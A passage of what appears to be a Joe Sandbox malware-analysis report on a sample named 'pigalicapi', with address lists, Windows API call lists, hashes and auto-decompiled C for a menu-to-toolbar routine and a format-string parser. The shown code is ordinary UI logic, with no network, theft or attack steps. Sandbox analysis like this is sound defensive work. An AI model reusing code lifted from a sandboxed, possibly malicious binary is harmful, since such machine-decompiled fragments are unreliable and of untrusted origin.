                                                                                                                                                                                                                                                                                          0x008124c3
                                                                                                                                                                                                                                                                                          0x008124c9
                                                                                                                                                                                                                                                                                          0x008124cc
                                                                                                                                                                                                                                                                                          0x008124cf
                                                                                                                                                                                                                                                                                          0x008124d1
                                                                                                                                                                                                                                                                                          0x008124d7
                                                                                                                                                                                                                                                                                          0x008124dd
                                                                                                                                                                                                                                                                                          0x008124e0
                                                                                                                                                                                                                                                                                          0x008124e2
                                                                                                                                                                                                                                                                                          0x008124e4
                                                                                                                                                                                                                                                                                          0x008124e4
                                                                                                                                                                                                                                                                                          0x008124f8
                                                                                                                                                                                                                                                                                          0x008124d3
                                                                                                                                                                                                                                                                                          0x008124d3
                                                                                                                                                                                                                                                                                          0x008124d5
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008124d5
                                                                                                                                                                                                                                                                                          0x008124fd
                                                                                                                                                                                                                                                                                          0x008123d7
                                                                                                                                                                                                                                                                                          0x008123d7
                                                                                                                                                                                                                                                                                          0x008123ef
                                                                                                                                                                                                                                                                                          0x008123f7
                                                                                                                                                                                                                                                                                          0x008123ff
                                                                                                                                                                                                                                                                                          0x00812402
                                                                                                                                                                                                                                                                                          0x00812407
                                                                                                                                                                                                                                                                                          0x0081240a
                                                                                                                                                                                                                                                                                          0x0081240e
                                                                                                                                                                                                                                                                                          0x00812411
                                                                                                                                                                                                                                                                                          0x00812414
                                                                                                                                                                                                                                                                                          0x00812431
                                                                                                                                                                                                                                                                                          0x00812433
                                                                                                                                                                                                                                                                                          0x00812440
                                                                                                                                                                                                                                                                                          0x00812440
                                                                                                                                                                                                                                                                                          0x00812435
                                                                                                                                                                                                                                                                                          0x00812435
                                                                                                                                                                                                                                                                                          0x00812439
                                                                                                                                                                                                                                                                                          0x0081243e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0081243e
                                                                                                                                                                                                                                                                                          0x00812446
                                                                                                                                                                                                                                                                                          0x0081246b
                                                                                                                                                                                                                                                                                          0x00812470
                                                                                                                                                                                                                                                                                          0x00812416
                                                                                                                                                                                                                                                                                          0x00812426
                                                                                                                                                                                                                                                                                          0x00812426
                                                                                                                                                                                                                                                                                          0x00812414
                                                                                                                                                                                                                                                                                          0x00812503
                                                                                                                                                                                                                                                                                          0x0081250b
                                                                                                                                                                                                                                                                                          0x00812511
                                                                                                                                                                                                                                                                                          0x00812516
                                                                                                                                                                                                                                                                                          0x00812523
                                                                                                                                                                                                                                                                                          0x00812526
                                                                                                                                                                                                                                                                                          0x00812529
                                                                                                                                                                                                                                                                                          0x0081252f
                                                                                                                                                                                                                                                                                          0x00812533
                                                                                                                                                                                                                                                                                          0x00812543
                                                                                                                                                                                                                                                                                          0x00812548
                                                                                                                                                                                                                                                                                          0x00812548
                                                                                                                                                                                                                                                                                          0x00812535
                                                                                                                                                                                                                                                                                          0x00812537
                                                                                                                                                                                                                                                                                          0x0081253c
                                                                                                                                                                                                                                                                                          0x0081253c
                                                                                                                                                                                                                                                                                          0x0081253c
                                                                                                                                                                                                                                                                                          0x00812562
                                                                                                                                                                                                                                                                                          0x0081256c
                                                                                                                                                                                                                                                                                          0x00812577
                                                                                                                                                                                                                                                                                          0x008122a0
                                                                                                                                                                                                                                                                                          0x008122a2
                                                                                                                                                                                                                                                                                          0x008122a5
                                                                                                                                                                                                                                                                                          0x008122ab
                                                                                                                                                                                                                                                                                          0x008122b2
                                                                                                                                                                                                                                                                                          0x008122b5
                                                                                                                                                                                                                                                                                          0x008122c3
                                                                                                                                                                                                                                                                                          0x008122cb
                                                                                                                                                                                                                                                                                          0x008122e4
                                                                                                                                                                                                                                                                                          0x008122e4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 00812282
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 0081228E
                                                                                                                                                                                                                                                                                          • DrawEdge.USER32(?,?,00000006,00000002), ref: 008122CE
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000001D), ref: 008122E9
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 008122F5
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000D), ref: 008122FD
                                                                                                                                                                                                                                                                                          • FrameRect.USER32 ref: 00812309
                                                                                                                                                                                                                                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00812362
                                                                                                                                                                                                                                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0081238E
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 0081239A
                                                                                                                                                                                                                                                                                          • FillRect.USER32 ref: 008123A9
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(0000000D), ref: 008123B1
                                                                                                                                                                                                                                                                                          • FrameRect.USER32 ref: 008123C0
                                                                                                                                                                                                                                                                                          • ImageList_Draw.COMCTL32(?,?,?,?,0080C527,00000001,?,?,?,?,0080ECC4), ref: 00812426
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000004), ref: 00812446
                                                                                                                                                                                                                                                                                          • GetSysColorBrush.USER32(00000010), ref: 00812450
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00812483
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 008124C3
                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00812529
                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 0081254C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Color$BrushRect$Fill$DrawFrame$EdgeImageInflateInfoItemList_MenuModeOffset_memset
                                                                                                                                                                                                                                                                                          • String ID: ,
                                                                                                                                                                                                                                                                                          • API String ID: 447778773-3772416878
                                                                                                                                                                                                                                                                                          • Opcode ID: 583ec7ad6fc81fc2bb6cc4a51e329ce25e2b2fb2dbdf3437593cd3c356f3f54e
                                                                                                                                                                                                                                                                                          • Instruction ID: 5ed88a6d2220996346a07ea941e90752f72193d25127439337140e4580e3c652
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 583ec7ad6fc81fc2bb6cc4a51e329ce25e2b2fb2dbdf3437593cd3c356f3f54e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC10CB1E002199FDB18CFA8D884AEEBBB9FF48310F148119E919E7355DB74A945CF90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                                                                                                                          			E0080BB40(struct HMENU__* __ecx, struct HWND__* __edx, void* __edi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v116;
                                                                                                                                                                                                                                                                                          				int _v120;
                                                                                                                                                                                                                                                                                          				int _v124;
                                                                                                                                                                                                                                                                                          				char _v127;
                                                                                                                                                                                                                                                                                          				char _v128;
                                                                                                                                                                                                                                                                                          				int _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v292;
                                                                                                                                                                                                                                                                                          				int _v296;
                                                                                                                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                                                                                                                          				CHAR* _v304;
                                                                                                                                                                                                                                                                                          				intOrPtr _v308;
                                                                                                                                                                                                                                                                                          				intOrPtr _v312;
                                                                                                                                                                                                                                                                                          				intOrPtr _v316;
                                                                                                                                                                                                                                                                                          				intOrPtr _v320;
                                                                                                                                                                                                                                                                                          				intOrPtr _v324;
                                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                                          				struct tagMENUITEMINFOA _v376;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t67;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t69;
                                                                                                                                                                                                                                                                                          				long _t74;
                                                                                                                                                                                                                                                                                          				struct HMENU__* _t75;
                                                                                                                                                                                                                                                                                          				int _t80;
                                                                                                                                                                                                                                                                                          				intOrPtr _t96;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				int _t126;
                                                                                                                                                                                                                                                                                          				long _t127;
                                                                                                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                                                                                                          				void* _t129;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t125 = __edi;
                                                                                                                                                                                                                                                                                          				_t118 = __edx;
                                                                                                                                                                                                                                                                                          				_t67 =  *0x869060; // 0xda7e2511
                                                                                                                                                                                                                                                                                          				_v8 = _t67 ^ _t128;
                                                                                                                                                                                                                                                                                          				_t126 = __ecx;
                                                                                                                                                                                                                                                                                          				if(__ecx == 0 || IsMenu(__ecx) != 0) {
                                                                                                                                                                                                                                                                                          					_t69 =  *(_t125 + 0x44);
                                                                                                                                                                                                                                                                                          					if(_t69 != 0 && ( *(_t125 + 0x58) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          						DestroyMenu(_t69);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					 *(_t125 + 0x44) = _t126;
                                                                                                                                                                                                                                                                                          					if(( *(_t125 + 0x84) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          						_t101 = SendMessageA;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 4), 0xb, 0, 0);
                                                                                                                                                                                                                                                                                          						_t74 = SendMessageA( *(_t125 + 4), 0x418, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_t74 > 0) {
                                                                                                                                                                                                                                                                                          							_t127 = _t74;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								SendMessageA( *(_t125 + 4), 0x416, 0, 0);
                                                                                                                                                                                                                                                                                          								_t127 = _t127 - 1;
                                                                                                                                                                                                                                                                                          							} while (_t127 != 0);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t75 =  *(_t125 + 0x44);
                                                                                                                                                                                                                                                                                          						if(_t75 != 0) {
                                                                                                                                                                                                                                                                                          							_t80 = GetMenuItemCount(_t75);
                                                                                                                                                                                                                                                                                          							_t126 = 0;
                                                                                                                                                                                                                                                                                          							_v296 = _t80;
                                                                                                                                                                                                                                                                                          							if(_t80 > 0) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									E00816820( &_v376, 0, 0x30);
                                                                                                                                                                                                                                                                                          									_v376.cbSize = 0x30;
                                                                                                                                                                                                                                                                                          									E00816820( &(_v292.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          									_t129 = _t129 + 0x18;
                                                                                                                                                                                                                                                                                          									_v292.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          									if(GetVersionExA( &_v292) == 0) {
                                                                                                                                                                                                                                                                                          										L16:
                                                                                                                                                                                                                                                                                          										_v376.cbSize = 0x2c;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t96 = _v292.dwMajorVersion;
                                                                                                                                                                                                                                                                                          										if(_t96 < 5 && (_t96 != 4 || _v292.dwMinorVersion < 0x5a)) {
                                                                                                                                                                                                                                                                                          											goto L16;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v376.fMask = 0x15;
                                                                                                                                                                                                                                                                                          									_v376.fType = 0;
                                                                                                                                                                                                                                                                                          									_v376.dwTypeData =  &_v116;
                                                                                                                                                                                                                                                                                          									_v376.cch = 0x64;
                                                                                                                                                                                                                                                                                          									GetMenuItemInfoA( *(_t125 + 0x44), _t126, 1,  &_v376);
                                                                                                                                                                                                                                                                                          									if(lstrlenA( &_v116) > 0x63) {
                                                                                                                                                                                                                                                                                          										_v376.fType = 4;
                                                                                                                                                                                                                                                                                          										SetMenuItemInfoA( *(_t125 + 0x44), _t126, 1,  &_v376);
                                                                                                                                                                                                                                                                                          										_v116 = 0;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									asm("sbb cl, cl");
                                                                                                                                                                                                                                                                                          									_v128 = 0;
                                                                                                                                                                                                                                                                                          									_v124 = 0;
                                                                                                                                                                                                                                                                                          									_v120 = 0;
                                                                                                                                                                                                                                                                                          									_v132 = 0;
                                                                                                                                                                                                                                                                                          									_v136 = 0;
                                                                                                                                                                                                                                                                                          									_v124 = 0;
                                                                                                                                                                                                                                                                                          									_v120 = 0;
                                                                                                                                                                                                                                                                                          									_v132 = _t126;
                                                                                                                                                                                                                                                                                          									_v128 = 4 + ( ~(_v376.fState & 0x00000003) & 0x000000fc);
                                                                                                                                                                                                                                                                                          									_v127 = 0x18;
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t125 + 4), 0x415, 0xffffffff,  &_v136);
                                                                                                                                                                                                                                                                                          									_v324 = 0;
                                                                                                                                                                                                                                                                                          									_v304 = 0;
                                                                                                                                                                                                                                                                                          									_v320 = 0;
                                                                                                                                                                                                                                                                                          									_v316 = 0;
                                                                                                                                                                                                                                                                                          									_v312 = 0;
                                                                                                                                                                                                                                                                                          									_v308 = 0;
                                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                                          									_v328 = 0x20;
                                                                                                                                                                                                                                                                                          									_v324 = 2;
                                                                                                                                                                                                                                                                                          									_v304 =  &_v116;
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t125 + 4), 0x442, _t126,  &_v328);
                                                                                                                                                                                                                                                                                          									_t126 = _t126 + 1;
                                                                                                                                                                                                                                                                                          								} while (_t126 < _v296);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t125 + 4), 0xb, 1, 0);
                                                                                                                                                                                                                                                                                          						_t118 =  *(_t125 + 4);
                                                                                                                                                                                                                                                                                          						InvalidateRect( *(_t125 + 4), 0, 1);
                                                                                                                                                                                                                                                                                          						UpdateWindow( *(_t125 + 4));
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E008159E6(1, _t101, _v8 ^ _t128, _t118, _t125, _t126);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E008159E6(_t99, _t101, _v8 ^ _t128, _t118, __edi, _t126);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



































                                                                                                                                                                                                                                                                                          0x0080bb40
                                                                                                                                                                                                                                                                                          0x0080bb40
                                                                                                                                                                                                                                                                                          0x0080bb49
                                                                                                                                                                                                                                                                                          0x0080bb50
                                                                                                                                                                                                                                                                                          0x0080bb55
                                                                                                                                                                                                                                                                                          0x0080bb59
                                                                                                                                                                                                                                                                                          0x0080bb76
                                                                                                                                                                                                                                                                                          0x0080bb7b
                                                                                                                                                                                                                                                                                          0x0080bb84
                                                                                                                                                                                                                                                                                          0x0080bb84
                                                                                                                                                                                                                                                                                          0x0080bb91
                                                                                                                                                                                                                                                                                          0x0080bb94
                                                                                                                                                                                                                                                                                          0x0080bb9d
                                                                                                                                                                                                                                                                                          0x0080bbaa
                                                                                                                                                                                                                                                                                          0x0080bbb9
                                                                                                                                                                                                                                                                                          0x0080bbbd
                                                                                                                                                                                                                                                                                          0x0080bbbf
                                                                                                                                                                                                                                                                                          0x0080bbc1
                                                                                                                                                                                                                                                                                          0x0080bbce
                                                                                                                                                                                                                                                                                          0x0080bbd0
                                                                                                                                                                                                                                                                                          0x0080bbd0
                                                                                                                                                                                                                                                                                          0x0080bbc1
                                                                                                                                                                                                                                                                                          0x0080bbd3
                                                                                                                                                                                                                                                                                          0x0080bbd8
                                                                                                                                                                                                                                                                                          0x0080bbdf
                                                                                                                                                                                                                                                                                          0x0080bbe5
                                                                                                                                                                                                                                                                                          0x0080bbe7
                                                                                                                                                                                                                                                                                          0x0080bbef
                                                                                                                                                                                                                                                                                          0x0080bbf5
                                                                                                                                                                                                                                                                                          0x0080bc00
                                                                                                                                                                                                                                                                                          0x0080bc13
                                                                                                                                                                                                                                                                                          0x0080bc1d
                                                                                                                                                                                                                                                                                          0x0080bc22
                                                                                                                                                                                                                                                                                          0x0080bc2c
                                                                                                                                                                                                                                                                                          0x0080bc3e
                                                                                                                                                                                                                                                                                          0x0080bc59
                                                                                                                                                                                                                                                                                          0x0080bc59
                                                                                                                                                                                                                                                                                          0x0080bc40
                                                                                                                                                                                                                                                                                          0x0080bc40
                                                                                                                                                                                                                                                                                          0x0080bc49
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080bc49
                                                                                                                                                                                                                                                                                          0x0080bc74
                                                                                                                                                                                                                                                                                          0x0080bc7e
                                                                                                                                                                                                                                                                                          0x0080bc88
                                                                                                                                                                                                                                                                                          0x0080bc8e
                                                                                                                                                                                                                                                                                          0x0080bc98
                                                                                                                                                                                                                                                                                          0x0080bcab
                                                                                                                                                                                                                                                                                          0x0080bcbb
                                                                                                                                                                                                                                                                                          0x0080bcc5
                                                                                                                                                                                                                                                                                          0x0080bccb
                                                                                                                                                                                                                                                                                          0x0080bccb
                                                                                                                                                                                                                                                                                          0x0080bce3
                                                                                                                                                                                                                                                                                          0x0080bce5
                                                                                                                                                                                                                                                                                          0x0080bce8
                                                                                                                                                                                                                                                                                          0x0080bceb
                                                                                                                                                                                                                                                                                          0x0080bcf0
                                                                                                                                                                                                                                                                                          0x0080bcf3
                                                                                                                                                                                                                                                                                          0x0080bcfc
                                                                                                                                                                                                                                                                                          0x0080bcff
                                                                                                                                                                                                                                                                                          0x0080bd0e
                                                                                                                                                                                                                                                                                          0x0080bd11
                                                                                                                                                                                                                                                                                          0x0080bd14
                                                                                                                                                                                                                                                                                          0x0080bd18
                                                                                                                                                                                                                                                                                          0x0080bd24
                                                                                                                                                                                                                                                                                          0x0080bd2a
                                                                                                                                                                                                                                                                                          0x0080bd30
                                                                                                                                                                                                                                                                                          0x0080bd36
                                                                                                                                                                                                                                                                                          0x0080bd3c
                                                                                                                                                                                                                                                                                          0x0080bd42
                                                                                                                                                                                                                                                                                          0x0080bd48
                                                                                                                                                                                                                                                                                          0x0080bd5a
                                                                                                                                                                                                                                                                                          0x0080bd64
                                                                                                                                                                                                                                                                                          0x0080bd6e
                                                                                                                                                                                                                                                                                          0x0080bd74
                                                                                                                                                                                                                                                                                          0x0080bd76
                                                                                                                                                                                                                                                                                          0x0080bd77
                                                                                                                                                                                                                                                                                          0x0080bbf5
                                                                                                                                                                                                                                                                                          0x0080bbef
                                                                                                                                                                                                                                                                                          0x0080bd8d
                                                                                                                                                                                                                                                                                          0x0080bd8f
                                                                                                                                                                                                                                                                                          0x0080bd97
                                                                                                                                                                                                                                                                                          0x0080bda1
                                                                                                                                                                                                                                                                                          0x0080bda1
                                                                                                                                                                                                                                                                                          0x0080bdbb
                                                                                                                                                                                                                                                                                          0x0080bb68
                                                                                                                                                                                                                                                                                          0x0080bb75
                                                                                                                                                                                                                                                                                          0x0080bb75

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsMenu.USER32 ref: 0080BB5C
                                                                                                                                                                                                                                                                                          • DestroyMenu.USER32(?,?,00000000), ref: 0080BB84
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BBAA
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BBB9
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BBCE
                                                                                                                                                                                                                                                                                          • GetMenuItemCount.USER32 ref: 0080BBDF
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0080BC00
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0080BC1D
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0080BC36
                                                                                                                                                                                                                                                                                          • GetMenuItemInfoA.USER32 ref: 0080BC98
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0080BCA2
                                                                                                                                                                                                                                                                                          • SetMenuItemInfoA.USER32(?,00000000,00000001,0000002C), ref: 0080BCC5
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BD18
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BD74
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0080BD8D
                                                                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000000), ref: 0080BD97
                                                                                                                                                                                                                                                                                          • UpdateWindow.USER32(?), ref: 0080BDA1
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Menu$Item$Info_memset$CountDestroyInvalidateRectUpdateVersionWindowlstrlen
                                                                                                                                                                                                                                                                                          • String ID: $,$Z$d
                                                                                                                                                                                                                                                                                          • API String ID: 1339012150-1066513455
                                                                                                                                                                                                                                                                                          • Opcode ID: aa453d7764019b6d18b8c16ac10fe7182ff35fbb381335b7e312a7cc9faa4917
                                                                                                                                                                                                                                                                                          • Instruction ID: 3404eafc506ac5182b6ae6ca30e3e8078f07241d01a5a552d7b389fbeb441ad4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa453d7764019b6d18b8c16ac10fe7182ff35fbb381335b7e312a7cc9faa4917
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37712EB1A00619ABDB70DF68CD85BD9B7B8FF08714F104299E608E72C1D775AA81CF94
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                          			E00805910(CHAR** _a4, CHAR* _a8, char _a12) {
                                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                                          				long* _v16;
                                                                                                                                                                                                                                                                                          				char* _v20;
                                                                                                                                                                                                                                                                                          				CHAR* _t88;
                                                                                                                                                                                                                                                                                          				CHAR* _t93;
                                                                                                                                                                                                                                                                                          				CHAR* _t95;
                                                                                                                                                                                                                                                                                          				int _t97;
                                                                                                                                                                                                                                                                                          				long* _t100;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				long* _t104;
                                                                                                                                                                                                                                                                                          				CHAR* _t105;
                                                                                                                                                                                                                                                                                          				CHAR* _t111;
                                                                                                                                                                                                                                                                                          				char _t115;
                                                                                                                                                                                                                                                                                          				char _t118;
                                                                                                                                                                                                                                                                                          				void* _t120;
                                                                                                                                                                                                                                                                                          				signed int _t122;
                                                                                                                                                                                                                                                                                          				long* _t123;
                                                                                                                                                                                                                                                                                          				long* _t124;
                                                                                                                                                                                                                                                                                          				long* _t125;
                                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                                          				char _t131;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t132;
                                                                                                                                                                                                                                                                                          				signed int _t133;
                                                                                                                                                                                                                                                                                          				long* _t134;
                                                                                                                                                                                                                                                                                          				char _t136;
                                                                                                                                                                                                                                                                                          				long* _t137;
                                                                                                                                                                                                                                                                                          				char _t139;
                                                                                                                                                                                                                                                                                          				CHAR* _t140;
                                                                                                                                                                                                                                                                                          				long* _t141;
                                                                                                                                                                                                                                                                                          				long* _t146;
                                                                                                                                                                                                                                                                                          				long* _t147;
                                                                                                                                                                                                                                                                                          				char _t150;
                                                                                                                                                                                                                                                                                          				void* _t153;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t156;
                                                                                                                                                                                                                                                                                          				intOrPtr _t158;
                                                                                                                                                                                                                                                                                          				signed int _t160;
                                                                                                                                                                                                                                                                                          				CHAR* _t168;
                                                                                                                                                                                                                                                                                          				long* _t170;
                                                                                                                                                                                                                                                                                          				long* _t171;
                                                                                                                                                                                                                                                                                          				long* _t181;
                                                                                                                                                                                                                                                                                          				long* _t183;
                                                                                                                                                                                                                                                                                          				intOrPtr _t186;
                                                                                                                                                                                                                                                                                          				CHAR** _t188;
                                                                                                                                                                                                                                                                                          				long* _t189;
                                                                                                                                                                                                                                                                                          				CHAR* _t191;
                                                                                                                                                                                                                                                                                          				LONG* _t192;
                                                                                                                                                                                                                                                                                          				LONG* _t193;
                                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                                          				void* _t212;
                                                                                                                                                                                                                                                                                          				void* _t213;
                                                                                                                                                                                                                                                                                          				void* _t216;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t191 = _a8;
                                                                                                                                                                                                                                                                                          				_v20 = _a12;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				while( *_t191 != 0) {
                                                                                                                                                                                                                                                                                          					if( *_t191 != 0x25) {
                                                                                                                                                                                                                                                                                          						L82:
                                                                                                                                                                                                                                                                                          						_t111 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          						_t63 =  &_v8;
                                                                                                                                                                                                                                                                                          						 *_t63 = _v8 + _t111 - _t191;
                                                                                                                                                                                                                                                                                          						__eflags =  *_t63;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          						_t115 =  *_t191;
                                                                                                                                                                                                                                                                                          						if(_t115 == 0x25) {
                                                                                                                                                                                                                                                                                          							goto L82;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t189 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							if(_t115 == 0) {
                                                                                                                                                                                                                                                                                          								L15:
                                                                                                                                                                                                                                                                                          								_push(_t191);
                                                                                                                                                                                                                                                                                          								_v12 = E008160F2();
                                                                                                                                                                                                                                                                                          								_t117 =  *_t191;
                                                                                                                                                                                                                                                                                          								_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          								if( *_t191 != 0) {
                                                                                                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                                                                                                          										_t153 = E008163BE(_t117);
                                                                                                                                                                                                                                                                                          										_t195 = _t195 + 4;
                                                                                                                                                                                                                                                                                          										if(_t153 == 0) {
                                                                                                                                                                                                                                                                                          											goto L18;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										_t191 = CharNextA(_t191);
                                                                                                                                                                                                                                                                                          										_t117 =  *_t191;
                                                                                                                                                                                                                                                                                          										if( *_t191 != 0) {
